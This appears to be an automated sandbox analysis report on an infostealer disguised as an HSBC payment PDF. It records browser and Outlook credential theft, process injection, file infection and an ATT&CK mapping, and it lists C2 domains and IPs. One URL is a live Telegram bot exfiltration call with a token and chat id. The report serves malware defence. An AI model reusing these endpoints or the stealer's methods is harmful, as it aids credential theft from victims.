              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00433F3A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004049A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR
              Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: WIN_81
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: WIN_XP
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: WIN_XPe
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: WIN_VISTA
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: WIN_7
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: WIN_8
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR
              Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00476283
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476747
              ATT&CK tactics and techniques (the number of matching signatures, where the report shows one, is given in parentheses):

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
              Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
              Execution: Native API (33); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
              Persistence: LSASS Driver (1); DLL Side-Loading (1); Valid Accounts (2); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
              Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); LSASS Driver (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (212); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
              Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (11); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (2); Timestomp (1); DLL Side-Loading (1); Masquerading (222); Valid Accounts (2); Virtualization/Sandbox Evasion (21); Access Token Manipulation (21); Process Injection (212)
              Credential Access: OS Credential Dumping (1); Input Capture (121); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
              Discovery: System Time Discovery (12); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (327); Security Software Discovery (331); Virtualization/Sandbox Evasion (21); Process Discovery (2); Application Window Discovery (11); System Owner/User Discovery (1); System Network Configuration Discovery (1); System Network Connections Discovery; Process Discovery
              Lateral Movement: Taint Shared Content (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
              Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Input Capture (121); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
              Command and Control: Web Service (1); Ingress Tool Transfer (2); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
              Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph (ID: 1572492; sample: HSBC Payment Notification S...; start date: 10/12/2024; architecture: WINDOWS; score: 100), recovered from the rendered graph:

              Start node
                Network: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 23 other IPs or domains
                Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
                Started processes: armsvc.exe; HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe; elevation_service.exe; 15 other processes

              armsvc.exe
                Network: ww99.fwiwk.biz (72.52.179.174; 49741, 49995, 80; LIQUIDWEBUS, United States); lpuegx.biz (82.112.184.197; 49763, 49815, 49872; FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU, Russian Federation); 7 other IPs or domains
                Dropped: C:\Windows\System32\wbengine.exe (PE32+); C:\Windows\System32\wbem\WmiApSrv.exe (PE32+); C:\Windows\System32\vds.exe (PE32+); 146 other malicious files
                Signatures: Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)

              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                Network: cvgrf.biz (54.244.188.177; 49701, 49702, 49716; AMAZON-02US, United States)
                Dropped: C:\Windows\System32\alg.exe (PE32+); C:\Windows\System32\AppVClient.exe (PE32+); C:\Program Files (x86)\...\armsvc.exe (PE32)
                Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Maps a DLL or memory area into another process
                Started process: RegSvcs.exe

              elevation_service.exe
                Signatures: Found direct / indirect Syscall (likely to bypass EDR)

              15 other processes
                Signatures: Creates files inside the volume driver (system volume information); Contains functionality to behave differently if execute on a Russian/Kazak computer

              RegSvcs.exe
                Network: api.telegram.org (149.154.167.220; 443, 49736; TELEGRAMRU, United Kingdom); checkip.dyndns.com (193.122.6.168; 49708, 80; ORACLE-BMC-31898US, United States); reallyfreegeoip.org (104.21.67.152; 443, 49715; CLOUDFLARENETUS, United States)
                Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Antivirus detection for the submitted sample
Source | Detection | Scanner | Label
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | 79% | ReversingLabs | Win32.Virus.Expiro
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | 100% | Avira | W32/Infector.Gen
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | 100% | Joe Sandbox ML | -
Antivirus detection for dropped files
Source | Detection | Scanner | Label
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML | -
              No Antivirus matches
              No Antivirus matches
Antivirus detection for URLs
Source | Detection | Scanner | Label
http://18.141.10.107/8Va& | 0% | Avira URL Cloud | safe
http://ww99.przvgke.biz/K | 100% | Avira URL Cloud | malware
https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.com | 0% | Avira URL Cloud | safe
http://54.244.188.177/NU$ | 0% | Avira URL Cloud | safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload | 0% | Avira URL Cloud | safe
http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686 | 100% | Avira URL Cloud | malware
http://54.244.188.177/leanpmxsxneexgiv | 0% | Avira URL Cloud | safe
http://82.112.184.197/hncx | 0% | Avira URL Cloud | safe
https://scss.adobesc.com0 | 0% | Avira URL Cloud | safe
https://scss.adobesc.cominvalidAnnotIdList | 0% | Avira URL Cloud | safe
https://scss.adobesc.comAcroCoreSyncSharedReviewLoggingEnabledAcrobat_DesktopUserhttps://comments.ad | 0% | Avira URL Cloud | safe
http://ww99.przvgke.biz/opymuwnb | 100% | Avira URL Cloud | malware
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/com | 0% | Avira URL Cloud | safe
http://54.244.188.177/mgppdv | 0% | Avira URL Cloud | safe
http://82.112.184.197/OV | 0% | Avira URL Cloud | safe
http://172.234.222.138/ | 0% | Avira URL Cloud | safe
http://54.244.188.177/I$o | 0% | Avira URL Cloud | safe
http://44.221.84.105/ | 0% | Avira URL Cloud | safe
http://44.221.84.105/bd | 0% | Avira URL Cloud | safe
https://scss.adobesc.comemptyAnnotations | 0% | Avira URL Cloud | safe
https://scss.adobesc.comK | 0% | Avira URL Cloud | safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFList | 0% | Avira URL Cloud | safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachine | 0% | Avira URL Cloud | safe
http://172.234.222.138/3VX& | 0% | Avira URL Cloud | safe
https://scss.adobesc.comReadStatus | 0% | Avira URL Cloud | safe
https://scss.adobesc.comcommandNameAdd_AnnotsDelete_AnnotsUpdate_AnnotsEurekaReviewFetchReviewUpdate | 0% | Avira URL Cloud | safe
https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer. | 0% | Avira URL Cloud | safe
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzU4NWQyYmRm | 100% | Avira URL Cloud | malware
http://54.244.188.177:80/mgppdv | 0% | Avira URL Cloud | safe
http://18.141.10.107/3VX& | 0% | Avira URL Cloud | safe
http://82.112.184.197/fprrydnqfsccl | 0% | Avira URL Cloud | safe
http://18.141.10.107/tydyiliq1 | 0% | Avira URL Cloud | safe
http://18.141.10.107/tydyiliq | 0% | Avira URL Cloud | safe
http://54.244.188.177/3VX& | 0% | Avira URL Cloud | safe
http://ww12.przvgke.biz/ | 100% | Avira URL Cloud | malware
Contacted domains (no antivirus detection was recorded for any domain)
Name | IP | Active | Malicious | Reputation
przvgke.biz | 172.234.222.138 | true | false | high
ssbzmoy.biz | 18.141.10.107 | true | false | high
knjghuig.biz | 18.141.10.107 | true | false | high
vjaxhpbji.biz | 82.112.184.197 | true | false | high
pywolwnvd.biz | 54.244.188.177 | true | false | high
reallyfreegeoip.org | 104.21.67.152 | true | false | high
ifsaia.biz | 13.251.16.150 | true | false | high
checkip.dyndns.com | 193.122.6.168 | true | false | high
cvgrf.biz | 54.244.188.177 | true | false | high
ww99.przvgke.biz | 72.52.179.174 | true | false | unknown
lpuegx.biz | 82.112.184.197 | true | false | high
ww99.fwiwk.biz | 72.52.179.174 | true | false | unknown
saytjshyf.biz | 44.221.84.105 | true | false | high
084725.parkingcrew.net | 76.223.26.96 | true | false | high
xlfhhhm.biz | 47.129.31.212 | true | false | high
fwiwk.biz | 172.234.222.143 | true | false | high
vcddkls.biz | 18.141.10.107 | true | false | high
npukfztj.biz | 44.221.84.105 | true | false | high
api.telegram.org | 149.154.167.220 | true | false | high
ww12.fwiwk.biz | unknown | unknown | true | unknown
zlenh.biz | unknown | unknown | false | high
checkip.dyndns.org | unknown | unknown | false | high
uhxqin.biz | unknown | unknown | false | high
ww12.przvgke.biz | unknown | unknown | true | unknown
anpmnmxo.biz | unknown | unknown | false | high
Contacted URLs (no antivirus detection was recorded for any URL)
Name | Malicious | Reputation
http://xlfhhhm.biz/sqemlirtfccimfo | false | high
http://lpuegx.biz/hncx | false | high
http://saytjshyf.biz/peioi | false | high
https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 | false | high
http://przvgke.biz/opymuwnb | false | high
http://fwiwk.biz/mepglnjkcg | false | high
http://checkip.dyndns.org/ | false | high
http://przvgke.biz/meqybx | false | high
http://vjaxhpbji.biz/hptny | false | high
http://pywolwnvd.biz/mgppdv | false | high
http://npukfztj.biz/bd | false | high
http://vjaxhpbji.biz/kp | false | high
http://ssbzmoy.biz/udp | false | high
http://cvgrf.biz/hfsfqfqbrwib | false | high
http://pywolwnvd.biz/leanpmxsxneexgiv | false | high
https://reallyfreegeoip.org/xml/8.46.123.175 | false | high
http://lpuegx.biz/fprrydnqfsccl | false | high
http://knjghuig.biz/tydyiliq | false | high
http://ifsaia.biz/vcyisuboorqd | false | high
http://vcddkls.biz/ymdlhl | false | high
URLs found in memory and binary data
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org | RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://18.141.10.107/8Va& | armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot | RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://ww99.przvgke.biz/K | armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.com | AdobeCollabSync.exe.4.dr | false | Avira URL Cloud: safe | unknown
http://knjghuig.biz/ | armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.00000000008A0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613 | RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://54.244.188.177/leanpmxsxneexgiv | armsvc.exe, 00000004.00000003.1354308285.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://scss.adobesc.cominvalidAnnotIdList | AdobeCollabSync.exe.4.dr | false | Avira URL Cloud: safe | unknown
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload | AdobeCollabSync.exe.4.dr | false | Avira URL Cloud: safe | unknown
http://54.244.188.177/NU$ | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686 | armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.00000000008A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://scss.adobesc.comreasoncom.adobe.review.sdk | AdobeCollabSync.exe.4.dr | false | - | high
